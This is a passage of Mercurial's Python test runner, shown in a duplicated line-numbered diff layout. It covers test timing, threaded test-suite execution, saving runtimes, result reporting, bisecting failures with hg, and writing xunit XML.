2251 raise test.failureException(
2251 raise test.failureException(
2252 'server failed to start (HGPORT=%s)' % test._startport
2252 'server failed to start (HGPORT=%s)' % test._startport
2253 )
2253 )
2254
2254
2255 # handle interactive prompt without releasing iolock
2255 # handle interactive prompt without releasing iolock
2256 if self._options.interactive:
2256 if self._options.interactive:
2257 if test.readrefout() != expected:
2257 if test.readrefout() != expected:
2258 self.stream.write(
2258 self.stream.write(
2259 'Reference output has changed (run again to prompt '
2259 'Reference output has changed (run again to prompt '
2260 'changes)'
2260 'changes)'
2261 )
2261 )
2262 else:
2262 else:
2263 self.stream.write('Accept this change? [y/N] ')
2263 self.stream.write('Accept this change? [y/N] ')
2264 self.stream.flush()
2264 self.stream.flush()
2265 answer = sys.stdin.readline().strip()
2265 answer = sys.stdin.readline().strip()
2266 if answer.lower() in ('y', 'yes'):
2266 if answer.lower() in ('y', 'yes'):
2267 if test.path.endswith(b'.t'):
2267 if test.path.endswith(b'.t'):
2268 rename(test.errpath, test.path)
2268 rename(test.errpath, test.path)
2269 else:
2269 else:
2270 rename(test.errpath, '%s.out' % test.path)
2270 rename(test.errpath, '%s.out' % test.path)
2271 accepted = True
2271 accepted = True
2272 if not accepted:
2272 if not accepted:
2273 self.faildata[test.name] = b''.join(lines)
2273 self.faildata[test.name] = b''.join(lines)
2274
2274
2275 return accepted
2275 return accepted
2276
2276
2277 def startTest(self, test):
2277 def startTest(self, test):
2278 super(TestResult, self).startTest(test)
2278 super(TestResult, self).startTest(test)
2279
2279
2280 # os.times module computes the user time and system time spent by
2280 # os.times module computes the user time and system time spent by
2281 # child's processes along with real elapsed time taken by a process.
2281 # child's processes along with real elapsed time taken by a process.
2282 # This module has one limitation. It can only work for Linux user
2282 # This module has one limitation. It can only work for Linux user
2283 # and not for Windows. Hence why we fall back to another function
2283 # and not for Windows. Hence why we fall back to another function
2284 # for wall time calculations.
2284 # for wall time calculations.
2285 test.started_times = os.times()
2285 test.started_times = os.times()
2286 # TODO use a monotonic clock once support for Python 2.7 is dropped.
2286 # TODO use a monotonic clock once support for Python 2.7 is dropped.
2287 test.started_time = time.time()
2287 test.started_time = time.time()
2288 if self._firststarttime is None: # thread racy but irrelevant
2288 if self._firststarttime is None: # thread racy but irrelevant
2289 self._firststarttime = test.started_time
2289 self._firststarttime = test.started_time
2290
2290
2291 def stopTest(self, test, interrupted=False):
2291 def stopTest(self, test, interrupted=False):
2292 super(TestResult, self).stopTest(test)
2292 super(TestResult, self).stopTest(test)
2293
2293
2294 test.stopped_times = os.times()
2294 test.stopped_times = os.times()
2295 stopped_time = time.time()
2295 stopped_time = time.time()
2296
2296
2297 starttime = test.started_times
2297 starttime = test.started_times
2298 endtime = test.stopped_times
2298 endtime = test.stopped_times
2299 origin = self._firststarttime
2299 origin = self._firststarttime
2300 self.times.append(
2300 self.times.append(
2301 (
2301 (
2302 test.name,
2302 test.name,
2303 endtime[2] - starttime[2], # user space CPU time
2303 endtime[2] - starttime[2], # user space CPU time
2304 endtime[3] - starttime[3], # sys space CPU time
2304 endtime[3] - starttime[3], # sys space CPU time
2305 stopped_time - test.started_time, # real time
2305 stopped_time - test.started_time, # real time
2306 test.started_time - origin, # start date in run context
2306 test.started_time - origin, # start date in run context
2307 stopped_time - origin, # end date in run context
2307 stopped_time - origin, # end date in run context
2308 )
2308 )
2309 )
2309 )
2310
2310
2311 if interrupted:
2311 if interrupted:
2312 with iolock:
2312 with iolock:
2313 self.stream.writeln(
2313 self.stream.writeln(
2314 'INTERRUPTED: %s (after %d seconds)'
2314 'INTERRUPTED: %s (after %d seconds)'
2315 % (test.name, self.times[-1][3])
2315 % (test.name, self.times[-1][3])
2316 )
2316 )
2317
2317
2318
2318
2319 def getTestResult():
2319 def getTestResult():
2320 """
2320 """
2321 Returns the relevant test result
2321 Returns the relevant test result
2322 """
2322 """
2323 if "CUSTOM_TEST_RESULT" in os.environ:
2323 if "CUSTOM_TEST_RESULT" in os.environ:
2324 testresultmodule = __import__(os.environ["CUSTOM_TEST_RESULT"])
2324 testresultmodule = __import__(os.environ["CUSTOM_TEST_RESULT"])
2325 return testresultmodule.TestResult
2325 return testresultmodule.TestResult
2326 else:
2326 else:
2327 return TestResult
2327 return TestResult
2328
2328
2329
2329
2330 class TestSuite(unittest.TestSuite):
2330 class TestSuite(unittest.TestSuite):
2331 """Custom unittest TestSuite that knows how to execute Mercurial tests."""
2331 """Custom unittest TestSuite that knows how to execute Mercurial tests."""
2332
2332
2333 def __init__(
2333 def __init__(
2334 self,
2334 self,
2335 testdir,
2335 testdir,
2336 jobs=1,
2336 jobs=1,
2337 whitelist=None,
2337 whitelist=None,
2338 blacklist=None,
2338 blacklist=None,
2339 retest=False,
2339 retest=False,
2340 keywords=None,
2340 keywords=None,
2341 loop=False,
2341 loop=False,
2342 runs_per_test=1,
2342 runs_per_test=1,
2343 loadtest=None,
2343 loadtest=None,
2344 showchannels=False,
2344 showchannels=False,
2345 *args,
2345 *args,
2346 **kwargs
2346 **kwargs
2347 ):
2347 ):
2348 """Create a new instance that can run tests with a configuration.
2348 """Create a new instance that can run tests with a configuration.
2349
2349
2350 testdir specifies the directory where tests are executed from. This
2350 testdir specifies the directory where tests are executed from. This
2351 is typically the ``tests`` directory from Mercurial's source
2351 is typically the ``tests`` directory from Mercurial's source
2352 repository.
2352 repository.
2353
2353
2354 jobs specifies the number of jobs to run concurrently. Each test
2354 jobs specifies the number of jobs to run concurrently. Each test
2355 executes on its own thread. Tests actually spawn new processes, so
2355 executes on its own thread. Tests actually spawn new processes, so
2356 state mutation should not be an issue.
2356 state mutation should not be an issue.
2357
2357
2358 If there is only one job, it will use the main thread.
2358 If there is only one job, it will use the main thread.
2359
2359
2360 whitelist and blacklist denote tests that have been whitelisted and
2360 whitelist and blacklist denote tests that have been whitelisted and
2361 blacklisted, respectively. These arguments don't belong in TestSuite.
2361 blacklisted, respectively. These arguments don't belong in TestSuite.
2362 Instead, whitelist and blacklist should be handled by the thing that
2362 Instead, whitelist and blacklist should be handled by the thing that
2363 populates the TestSuite with tests. They are present to preserve
2363 populates the TestSuite with tests. They are present to preserve
2364 backwards compatible behavior which reports skipped tests as part
2364 backwards compatible behavior which reports skipped tests as part
2365 of the results.
2365 of the results.
2366
2366
2367 retest denotes whether to retest failed tests. This arguably belongs
2367 retest denotes whether to retest failed tests. This arguably belongs
2368 outside of TestSuite.
2368 outside of TestSuite.
2369
2369
2370 keywords denotes key words that will be used to filter which tests
2370 keywords denotes key words that will be used to filter which tests
2371 to execute. This arguably belongs outside of TestSuite.
2371 to execute. This arguably belongs outside of TestSuite.
2372
2372
2373 loop denotes whether to loop over tests forever.
2373 loop denotes whether to loop over tests forever.
2374 """
2374 """
2375 super(TestSuite, self).__init__(*args, **kwargs)
2375 super(TestSuite, self).__init__(*args, **kwargs)
2376
2376
2377 self._jobs = jobs
2377 self._jobs = jobs
2378 self._whitelist = whitelist
2378 self._whitelist = whitelist
2379 self._blacklist = blacklist
2379 self._blacklist = blacklist
2380 self._retest = retest
2380 self._retest = retest
2381 self._keywords = keywords
2381 self._keywords = keywords
2382 self._loop = loop
2382 self._loop = loop
2383 self._runs_per_test = runs_per_test
2383 self._runs_per_test = runs_per_test
2384 self._loadtest = loadtest
2384 self._loadtest = loadtest
2385 self._showchannels = showchannels
2385 self._showchannels = showchannels
2386
2386
2387 def run(self, result):
2387 def run(self, result):
2388 # We have a number of filters that need to be applied. We do this
2388 # We have a number of filters that need to be applied. We do this
2389 # here instead of inside Test because it makes the running logic for
2389 # here instead of inside Test because it makes the running logic for
2390 # Test simpler.
2390 # Test simpler.
2391 tests = []
2391 tests = []
2392 num_tests = [0]
2392 num_tests = [0]
2393 for test in self._tests:
2393 for test in self._tests:
2394
2394
2395 def get():
2395 def get():
2396 num_tests[0] += 1
2396 num_tests[0] += 1
2397 if getattr(test, 'should_reload', False):
2397 if getattr(test, 'should_reload', False):
2398 return self._loadtest(test, num_tests[0])
2398 return self._loadtest(test, num_tests[0])
2399 return test
2399 return test
2400
2400
2401 if not os.path.exists(test.path):
2401 if not os.path.exists(test.path):
2402 result.addSkip(test, "Doesn't exist")
2402 result.addSkip(test, "Doesn't exist")
2403 continue
2403 continue
2404
2404
2405 if not (self._whitelist and test.bname in self._whitelist):
2405 if not (self._whitelist and test.bname in self._whitelist):
2406 if self._blacklist and test.bname in self._blacklist:
2406 if self._blacklist and test.bname in self._blacklist:
2407 result.addSkip(test, 'blacklisted')
2407 result.addSkip(test, 'blacklisted')
2408 continue
2408 continue
2409
2409
2410 if self._retest and not os.path.exists(test.errpath):
2410 if self._retest and not os.path.exists(test.errpath):
2411 result.addIgnore(test, 'not retesting')
2411 result.addIgnore(test, 'not retesting')
2412 continue
2412 continue
2413
2413
2414 if self._keywords:
2414 if self._keywords:
2415 with open(test.path, 'rb') as f:
2415 with open(test.path, 'rb') as f:
2416 t = f.read().lower() + test.bname.lower()
2416 t = f.read().lower() + test.bname.lower()
2417 ignored = False
2417 ignored = False
2418 for k in self._keywords.lower().split():
2418 for k in self._keywords.lower().split():
2419 if k not in t:
2419 if k not in t:
2420 result.addIgnore(test, "doesn't match keyword")
2420 result.addIgnore(test, "doesn't match keyword")
2421 ignored = True
2421 ignored = True
2422 break
2422 break
2423
2423
2424 if ignored:
2424 if ignored:
2425 continue
2425 continue
2426 for _ in xrange(self._runs_per_test):
2426 for _ in xrange(self._runs_per_test):
2427 tests.append(get())
2427 tests.append(get())
2428
2428
2429 runtests = list(tests)
2429 runtests = list(tests)
2430 done = queue.Queue()
2430 done = queue.Queue()
2431 running = 0
2431 running = 0
2432
2432
2433 channels = [""] * self._jobs
2433 channels = [""] * self._jobs
2434
2434
2435 def job(test, result):
2435 def job(test, result):
2436 for n, v in enumerate(channels):
2436 for n, v in enumerate(channels):
2437 if not v:
2437 if not v:
2438 channel = n
2438 channel = n
2439 break
2439 break
2440 else:
2440 else:
2441 raise ValueError('Could not find output channel')
2441 raise ValueError('Could not find output channel')
2442 channels[channel] = "=" + test.name[5:].split(".")[0]
2442 channels[channel] = "=" + test.name[5:].split(".")[0]
2443 try:
2443 try:
2444 test(result)
2444 test(result)
2445 done.put(None)
2445 done.put(None)
2446 except KeyboardInterrupt:
2446 except KeyboardInterrupt:
2447 pass
2447 pass
2448 except: # re-raises
2448 except: # re-raises
2449 done.put(('!', test, 'run-test raised an error, see traceback'))
2449 done.put(('!', test, 'run-test raised an error, see traceback'))
2450 raise
2450 raise
2451 finally:
2451 finally:
2452 try:
2452 try:
2453 channels[channel] = ''
2453 channels[channel] = ''
2454 except IndexError:
2454 except IndexError:
2455 pass
2455 pass
2456
2456
2457 def stat():
2457 def stat():
2458 count = 0
2458 count = 0
2459 while channels:
2459 while channels:
2460 d = '\n%03s ' % count
2460 d = '\n%03s ' % count
2461 for n, v in enumerate(channels):
2461 for n, v in enumerate(channels):
2462 if v:
2462 if v:
2463 d += v[0]
2463 d += v[0]
2464 channels[n] = v[1:] or '.'
2464 channels[n] = v[1:] or '.'
2465 else:
2465 else:
2466 d += ' '
2466 d += ' '
2467 d += ' '
2467 d += ' '
2468 with iolock:
2468 with iolock:
2469 sys.stdout.write(d + ' ')
2469 sys.stdout.write(d + ' ')
2470 sys.stdout.flush()
2470 sys.stdout.flush()
2471 for x in xrange(10):
2471 for x in xrange(10):
2472 if channels:
2472 if channels:
2473 time.sleep(0.1)
2473 time.sleep(0.1)
2474 count += 1
2474 count += 1
2475
2475
2476 stoppedearly = False
2476 stoppedearly = False
2477
2477
2478 if self._showchannels:
2478 if self._showchannels:
2479 statthread = threading.Thread(target=stat, name="stat")
2479 statthread = threading.Thread(target=stat, name="stat")
2480 statthread.start()
2480 statthread.start()
2481
2481
2482 try:
2482 try:
2483 while tests or running:
2483 while tests or running:
2484 if not done.empty() or running == self._jobs or not tests:
2484 if not done.empty() or running == self._jobs or not tests:
2485 try:
2485 try:
2486 done.get(True, 1)
2486 done.get(True, 1)
2487 running -= 1
2487 running -= 1
2488 if result and result.shouldStop:
2488 if result and result.shouldStop:
2489 stoppedearly = True
2489 stoppedearly = True
2490 break
2490 break
2491 except queue.Empty:
2491 except queue.Empty:
2492 continue
2492 continue
2493 if tests and not running == self._jobs:
2493 if tests and not running == self._jobs:
2494 test = tests.pop(0)
2494 test = tests.pop(0)
2495 if self._loop:
2495 if self._loop:
2496 if getattr(test, 'should_reload', False):
2496 if getattr(test, 'should_reload', False):
2497 num_tests[0] += 1
2497 num_tests[0] += 1
2498 tests.append(self._loadtest(test, num_tests[0]))
2498 tests.append(self._loadtest(test, num_tests[0]))
2499 else:
2499 else:
2500 tests.append(test)
2500 tests.append(test)
2501 if self._jobs == 1:
2501 if self._jobs == 1:
2502 job(test, result)
2502 job(test, result)
2503 else:
2503 else:
2504 t = threading.Thread(
2504 t = threading.Thread(
2505 target=job, name=test.name, args=(test, result)
2505 target=job, name=test.name, args=(test, result)
2506 )
2506 )
2507 t.start()
2507 t.start()
2508 running += 1
2508 running += 1
2509
2509
2510 # If we stop early we still need to wait on started tests to
2510 # If we stop early we still need to wait on started tests to
2511 # finish. Otherwise, there is a race between the test completing
2511 # finish. Otherwise, there is a race between the test completing
2512 # and the test's cleanup code running. This could result in the
2512 # and the test's cleanup code running. This could result in the
2513 # test reporting incorrect.
2513 # test reporting incorrect.
2514 if stoppedearly:
2514 if stoppedearly:
2515 while running:
2515 while running:
2516 try:
2516 try:
2517 done.get(True, 1)
2517 done.get(True, 1)
2518 running -= 1
2518 running -= 1
2519 except queue.Empty:
2519 except queue.Empty:
2520 continue
2520 continue
2521 except KeyboardInterrupt:
2521 except KeyboardInterrupt:
2522 for test in runtests:
2522 for test in runtests:
2523 test.abort()
2523 test.abort()
2524
2524
2525 channels = []
2525 channels = []
2526
2526
2527 return result
2527 return result
2528
2528
2529
2529
2530 # Save the most recent 5 wall-clock runtimes of each test to a
2530 # Save the most recent 5 wall-clock runtimes of each test to a
2531 # human-readable text file named .testtimes. Tests are sorted
2531 # human-readable text file named .testtimes. Tests are sorted
2532 # alphabetically, while times for each test are listed from oldest to
2532 # alphabetically, while times for each test are listed from oldest to
2533 # newest.
2533 # newest.
2534
2534
2535
2535
2536 def loadtimes(outputdir):
2536 def loadtimes(outputdir):
2537 times = []
2537 times = []
2538 try:
2538 try:
2539 with open(os.path.join(outputdir, b'.testtimes')) as fp:
2539 with open(os.path.join(outputdir, b'.testtimes')) as fp:
2540 for line in fp:
2540 for line in fp:
2541 m = re.match('(.*?) ([0-9. ]+)', line)
2541 m = re.match('(.*?) ([0-9. ]+)', line)
2542 times.append(
2542 times.append(
2543 (m.group(1), [float(t) for t in m.group(2).split()])
2543 (m.group(1), [float(t) for t in m.group(2).split()])
2544 )
2544 )
2545 except IOError as err:
2545 except IOError as err:
2546 if err.errno != errno.ENOENT:
2546 if err.errno != errno.ENOENT:
2547 raise
2547 raise
2548 return times
2548 return times
2549
2549
2550
2550
2551 def savetimes(outputdir, result):
2551 def savetimes(outputdir, result):
2552 saved = dict(loadtimes(outputdir))
2552 saved = dict(loadtimes(outputdir))
2553 maxruns = 5
2553 maxruns = 5
2554 skipped = {str(t[0]) for t in result.skipped}
2554 skipped = {str(t[0]) for t in result.skipped}
2555 for tdata in result.times:
2555 for tdata in result.times:
2556 test, real = tdata[0], tdata[3]
2556 test, real = tdata[0], tdata[3]
2557 if test not in skipped:
2557 if test not in skipped:
2558 ts = saved.setdefault(test, [])
2558 ts = saved.setdefault(test, [])
2559 ts.append(real)
2559 ts.append(real)
2560 ts[:] = ts[-maxruns:]
2560 ts[:] = ts[-maxruns:]
2561
2561
2562 fd, tmpname = tempfile.mkstemp(
2562 fd, tmpname = tempfile.mkstemp(
2563 prefix=b'.testtimes', dir=outputdir, text=True
2563 prefix=b'.testtimes', dir=outputdir, text=True
2564 )
2564 )
2565 with os.fdopen(fd, 'w') as fp:
2565 with os.fdopen(fd, 'w') as fp:
2566 for name, ts in sorted(saved.items()):
2566 for name, ts in sorted(saved.items()):
2567 fp.write('%s %s\n' % (name, ' '.join(['%.3f' % (t,) for t in ts])))
2567 fp.write('%s %s\n' % (name, ' '.join(['%.3f' % (t,) for t in ts])))
2568 timepath = os.path.join(outputdir, b'.testtimes')
2568 timepath = os.path.join(outputdir, b'.testtimes')
2569 try:
2569 try:
2570 os.unlink(timepath)
2570 os.unlink(timepath)
2571 except OSError:
2571 except OSError:
2572 pass
2572 pass
2573 try:
2573 try:
2574 os.rename(tmpname, timepath)
2574 os.rename(tmpname, timepath)
2575 except OSError:
2575 except OSError:
2576 pass
2576 pass
2577
2577
2578
2578
2579 class TextTestRunner(unittest.TextTestRunner):
2579 class TextTestRunner(unittest.TextTestRunner):
2580 """Custom unittest test runner that uses appropriate settings."""
2580 """Custom unittest test runner that uses appropriate settings."""
2581
2581
2582 def __init__(self, runner, *args, **kwargs):
2582 def __init__(self, runner, *args, **kwargs):
2583 super(TextTestRunner, self).__init__(*args, **kwargs)
2583 super(TextTestRunner, self).__init__(*args, **kwargs)
2584
2584
2585 self._runner = runner
2585 self._runner = runner
2586
2586
2587 self._result = getTestResult()(
2587 self._result = getTestResult()(
2588 self._runner.options, self.stream, self.descriptions, self.verbosity
2588 self._runner.options, self.stream, self.descriptions, self.verbosity
2589 )
2589 )
2590
2590
2591 def listtests(self, test):
2591 def listtests(self, test):
2592 test = sorted(test, key=lambda t: t.name)
2592 test = sorted(test, key=lambda t: t.name)
2593
2593
2594 self._result.onStart(test)
2594 self._result.onStart(test)
2595
2595
2596 for t in test:
2596 for t in test:
2597 print(t.name)
2597 print(t.name)
2598 self._result.addSuccess(t)
2598 self._result.addSuccess(t)
2599
2599
2600 if self._runner.options.xunit:
2600 if self._runner.options.xunit:
2601 with open(self._runner.options.xunit, "wb") as xuf:
2601 with open(self._runner.options.xunit, "wb") as xuf:
2602 self._writexunit(self._result, xuf)
2602 self._writexunit(self._result, xuf)
2603
2603
2604 if self._runner.options.json:
2604 if self._runner.options.json:
2605 jsonpath = os.path.join(self._runner._outputdir, b'report.json')
2605 jsonpath = os.path.join(self._runner._outputdir, b'report.json')
2606 with open(jsonpath, 'w') as fp:
2606 with open(jsonpath, 'w') as fp:
2607 self._writejson(self._result, fp)
2607 self._writejson(self._result, fp)
2608
2608
2609 return self._result
2609 return self._result
2610
2610
2611 def run(self, test):
2611 def run(self, test):
2612 self._result.onStart(test)
2612 self._result.onStart(test)
2613 test(self._result)
2613 test(self._result)
2614
2614
2615 failed = len(self._result.failures)
2615 failed = len(self._result.failures)
2616 skipped = len(self._result.skipped)
2616 skipped = len(self._result.skipped)
2617 ignored = len(self._result.ignored)
2617 ignored = len(self._result.ignored)
2618
2618
2619 with iolock:
2619 with iolock:
2620 self.stream.writeln('')
2620 self.stream.writeln('')
2621
2621
2622 if not self._runner.options.noskips:
2622 if not self._runner.options.noskips:
2623 for test, msg in sorted(
2623 for test, msg in sorted(
2624 self._result.skipped, key=lambda s: s[0].name
2624 self._result.skipped, key=lambda s: s[0].name
2625 ):
2625 ):
2626 formatted = 'Skipped %s: %s\n' % (test.name, msg)
2626 formatted = 'Skipped %s: %s\n' % (test.name, msg)
2627 msg = highlightmsg(formatted, self._result.color)
2627 msg = highlightmsg(formatted, self._result.color)
2628 self.stream.write(msg)
2628 self.stream.write(msg)
2629 for test, msg in sorted(
2629 for test, msg in sorted(
2630 self._result.failures, key=lambda f: f[0].name
2630 self._result.failures, key=lambda f: f[0].name
2631 ):
2631 ):
2632 formatted = 'Failed %s: %s\n' % (test.name, msg)
2632 formatted = 'Failed %s: %s\n' % (test.name, msg)
2633 self.stream.write(highlightmsg(formatted, self._result.color))
2633 self.stream.write(highlightmsg(formatted, self._result.color))
2634 for test, msg in sorted(
2634 for test, msg in sorted(
2635 self._result.errors, key=lambda e: e[0].name
2635 self._result.errors, key=lambda e: e[0].name
2636 ):
2636 ):
2637 self.stream.writeln('Errored %s: %s' % (test.name, msg))
2637 self.stream.writeln('Errored %s: %s' % (test.name, msg))
2638
2638
2639 if self._runner.options.xunit:
2639 if self._runner.options.xunit:
2640 with open(self._runner.options.xunit, "wb") as xuf:
2640 with open(self._runner.options.xunit, "wb") as xuf:
2641 self._writexunit(self._result, xuf)
2641 self._writexunit(self._result, xuf)
2642
2642
2643 if self._runner.options.json:
2643 if self._runner.options.json:
2644 jsonpath = os.path.join(self._runner._outputdir, b'report.json')
2644 jsonpath = os.path.join(self._runner._outputdir, b'report.json')
2645 with open(jsonpath, 'w') as fp:
2645 with open(jsonpath, 'w') as fp:
2646 self._writejson(self._result, fp)
2646 self._writejson(self._result, fp)
2647
2647
2648 self._runner._checkhglib('Tested')
2648 self._runner._checkhglib('Tested')
2649
2649
2650 savetimes(self._runner._outputdir, self._result)
2650 savetimes(self._runner._outputdir, self._result)
2651
2651
2652 if failed and self._runner.options.known_good_rev:
2652 if failed and self._runner.options.known_good_rev:
2653 self._bisecttests(t for t, m in self._result.failures)
2653 self._bisecttests(t for t, m in self._result.failures)
2654 self.stream.writeln(
2654 self.stream.writeln(
2655 '# Ran %d tests, %d skipped, %d failed.'
2655 '# Ran %d tests, %d skipped, %d failed.'
2656 % (self._result.testsRun, skipped + ignored, failed)
2656 % (self._result.testsRun, skipped + ignored, failed)
2657 )
2657 )
2658 if failed:
2658 if failed:
2659 self.stream.writeln(
2659 self.stream.writeln(
2660 'python hash seed: %s' % os.environ['PYTHONHASHSEED']
2660 'python hash seed: %s' % os.environ['PYTHONHASHSEED']
2661 )
2661 )
2662 if self._runner.options.time:
2662 if self._runner.options.time:
2663 self.printtimes(self._result.times)
2663 self.printtimes(self._result.times)
2664
2664
2665 if self._runner.options.exceptions:
2665 if self._runner.options.exceptions:
2666 exceptions = aggregateexceptions(
2666 exceptions = aggregateexceptions(
2667 os.path.join(self._runner._outputdir, b'exceptions')
2667 os.path.join(self._runner._outputdir, b'exceptions')
2668 )
2668 )
2669
2669
2670 self.stream.writeln('Exceptions Report:')
2670 self.stream.writeln('Exceptions Report:')
2671 self.stream.writeln(
2671 self.stream.writeln(
2672 '%d total from %d frames'
2672 '%d total from %d frames'
2673 % (exceptions['total'], len(exceptions['exceptioncounts']))
2673 % (exceptions['total'], len(exceptions['exceptioncounts']))
2674 )
2674 )
2675 combined = exceptions['combined']
2675 combined = exceptions['combined']
2676 for key in sorted(combined, key=combined.get, reverse=True):
2676 for key in sorted(combined, key=combined.get, reverse=True):
2677 frame, line, exc = key
2677 frame, line, exc = key
2678 totalcount, testcount, leastcount, leasttest = combined[key]
2678 totalcount, testcount, leastcount, leasttest = combined[key]
2679
2679
2680 self.stream.writeln(
2680 self.stream.writeln(
2681 '%d (%d tests)\t%s: %s (%s - %d total)'
2681 '%d (%d tests)\t%s: %s (%s - %d total)'
2682 % (
2682 % (
2683 totalcount,
2683 totalcount,
2684 testcount,
2684 testcount,
2685 frame,
2685 frame,
2686 exc,
2686 exc,
2687 leasttest,
2687 leasttest,
2688 leastcount,
2688 leastcount,
2689 )
2689 )
2690 )
2690 )
2691
2691
2692 self.stream.flush()
2692 self.stream.flush()
2693
2693
2694 return self._result
2694 return self._result
2695
2695
2696 def _bisecttests(self, tests):
2696 def _bisecttests(self, tests):
2697 bisectcmd = ['hg', 'bisect']
2697 bisectcmd = ['hg', 'bisect']
2698 bisectrepo = self._runner.options.bisect_repo
2698 bisectrepo = self._runner.options.bisect_repo
2699 if bisectrepo:
2699 if bisectrepo:
2700 bisectcmd.extend(['-R', os.path.abspath(bisectrepo)])
2700 bisectcmd.extend(['-R', os.path.abspath(bisectrepo)])
2701
2701
2702 def pread(args):
2702 def pread(args):
2703 env = os.environ.copy()
2703 env = os.environ.copy()
2704 env['HGPLAIN'] = '1'
2704 env['HGPLAIN'] = '1'
2705 p = subprocess.Popen(
2705 p = subprocess.Popen(
2706 args, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, env=env
2706 args, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, env=env
2707 )
2707 )
2708 data = p.stdout.read()
2708 data = p.stdout.read()
2709 p.wait()
2709 p.wait()
2710 return data
2710 return data
2711
2711
2712 for test in tests:
2712 for test in tests:
2713 pread(bisectcmd + ['--reset']),
2713 pread(bisectcmd + ['--reset']),
2714 pread(bisectcmd + ['--bad', '.'])
2714 pread(bisectcmd + ['--bad', '.'])
2715 pread(bisectcmd + ['--good', self._runner.options.known_good_rev])
2715 pread(bisectcmd + ['--good', self._runner.options.known_good_rev])
2716 # TODO: we probably need to forward more options
2716 # TODO: we probably need to forward more options
2717 # that alter hg's behavior inside the tests.
2717 # that alter hg's behavior inside the tests.
2718 opts = ''
2718 opts = ''
2719 withhg = self._runner.options.with_hg
2719 withhg = self._runner.options.with_hg
2720 if withhg:
2720 if withhg:
2721 opts += ' --with-hg=%s ' % shellquote(_bytes2sys(withhg))
2721 opts += ' --with-hg=%s ' % shellquote(_bytes2sys(withhg))
2722 rtc = '%s %s %s %s' % (sysexecutable, sys.argv[0], opts, test)
2722 rtc = '%s %s %s %s' % (sysexecutable, sys.argv[0], opts, test)
2723 data = pread(bisectcmd + ['--command', rtc])
2723 data = pread(bisectcmd + ['--command', rtc])
2724 m = re.search(
2724 m = re.search(
2725 (
2725 (
2726 br'\nThe first (?P<goodbad>bad|good) revision '
2726 br'\nThe first (?P<goodbad>bad|good) revision '
2727 br'is:\nchangeset: +\d+:(?P<node>[a-f0-9]+)\n.*\n'
2727 br'is:\nchangeset: +\d+:(?P<node>[a-f0-9]+)\n.*\n'
2728 br'summary: +(?P<summary>[^\n]+)\n'
2728 br'summary: +(?P<summary>[^\n]+)\n'
2729 ),
2729 ),
2730 data,
2730 data,
2731 (re.MULTILINE | re.DOTALL),
2731 (re.MULTILINE | re.DOTALL),
2732 )
2732 )
2733 if m is None:
2733 if m is None:
2734 self.stream.writeln(
2734 self.stream.writeln(
2735 'Failed to identify failure point for %s' % test
2735 'Failed to identify failure point for %s' % test
2736 )
2736 )
2737 continue
2737 continue
2738 dat = m.groupdict()
2738 dat = m.groupdict()
2739 verb = 'broken' if dat['goodbad'] == b'bad' else 'fixed'
2739 verb = 'broken' if dat['goodbad'] == b'bad' else 'fixed'
2740 self.stream.writeln(
2740 self.stream.writeln(
2741 '%s %s by %s (%s)'
2741 '%s %s by %s (%s)'
2742 % (
2742 % (
2743 test,
2743 test,
2744 verb,
2744 verb,
2745 dat['node'].decode('ascii'),
2745 dat['node'].decode('ascii'),
2746 dat['summary'].decode('utf8', 'ignore'),
2746 dat['summary'].decode('utf8', 'ignore'),
2747 )
2747 )
2748 )
2748 )
2749
2749
2750 def printtimes(self, times):
2750 def printtimes(self, times):
2751 # iolock held by run
2751 # iolock held by run
2752 self.stream.writeln('# Producing time report')
2752 self.stream.writeln('# Producing time report')
2753 times.sort(key=lambda t: (t[3]))
2753 times.sort(key=lambda t: (t[3]))
2754 cols = '%7.3f %7.3f %7.3f %7.3f %7.3f %s'
2754 cols = '%7.3f %7.3f %7.3f %7.3f %7.3f %s'
2755 self.stream.writeln(
2755 self.stream.writeln(
2756 '%-7s %-7s %-7s %-7s %-7s %s'
2756 '%-7s %-7s %-7s %-7s %-7s %s'
2757 % ('start', 'end', 'cuser', 'csys', 'real', 'Test')
2757 % ('start', 'end', 'cuser', 'csys', 'real', 'Test')
2758 )
2758 )
2759 for tdata in times:
2759 for tdata in times:
2760 test = tdata[0]
2760 test = tdata[0]
2761 cuser, csys, real, start, end = tdata[1:6]
2761 cuser, csys, real, start, end = tdata[1:6]
2762 self.stream.writeln(cols % (start, end, cuser, csys, real, test))
2762 self.stream.writeln(cols % (start, end, cuser, csys, real, test))
2763
2763
2764 @staticmethod
2764 @staticmethod
2765 def _writexunit(result, outf):
2765 def _writexunit(result, outf):
2766 # See http://llg.cubic.org/docs/junit/ for a reference.
2766 # See http://llg.cubic.org/docs/junit/ for a reference.
2767 timesd = {t[0]: t[3] for t in result.times}
2767 timesd = {t[0]: t[3] for t in result.times}
2768 doc = minidom.Document()
2768 doc = minidom.Document()
2769 s = doc.createElement('testsuite')
2769 s = doc.createElement('testsuite')
2770 s.setAttribute('errors', "0") # TODO
2770 s.setAttribute('errors', "0") # TODO
2771 s.setAttribute('failures', str(len(result.failures)))
2771 s.setAttribute('failures', str(len(result.failures)))
2772 s.setAttribute('name', 'run-tests')
2772 s.setAttribute('name', 'run-tests')
2773 s.setAttribute(
2773 s.setAttribute(
2774 'skipped', str(len(result.skipped) + len(result.ignored))
2774 'skipped', str(len(result.skipped) + len(result.ignored))
2775 )
2775 )
2776 s.setAttribute('tests', str(result.testsRun))
2776 s.setAttribute('tests', str(result.testsRun))
2777 doc.appendChild(s)
2777 doc.appendChild(s)
2778 for tc in result.successes:
2778 for tc in result.successes:
2779 t = doc.createElement('testcase')
2779 t = doc.createElement('testcase')
2780 t.setAttribute('name', tc.name)
2780 t.setAttribute('name', tc.name)
2781 tctime = timesd.get(tc.name)
2781 tctime = timesd.get(tc.name)
2782 if tctime is not None:
2782 if tctime is not None:
2783 t.setAttribute('time', '%.3f' % tctime)
2783 t.setAttribute('time', '%.3f' % tctime)
2784 s.appendChild(t)
2784 s.appendChild(t)
2785 for tc, err in sorted(result.faildata.items()):
2785 for tc, err in sorted(result.faildata.items()):
2786 t = doc.createElement('testcase')
2786 t = doc.createElement('testcase')
2787 t.setAttribute('name', tc)
2787 t.setAttribute('name', tc)
2788 tctime = timesd.get(tc)
2788 tctime = timesd.get(tc)
2789 if tctime is not None:
2789 if tctime is not None:
2790 t.setAttribute('time', '%.3f' % tctime)
2790 t.setAttribute('time', '%.3f' % tctime)
2791 # createCDATASection expects a unicode or it will
2791 # createCDATASection expects a unicode or it will
2792 # convert using default conversion rules, which will
2792 # convert using default conversion rules, which will
2793 # fail if string isn't ASCII.
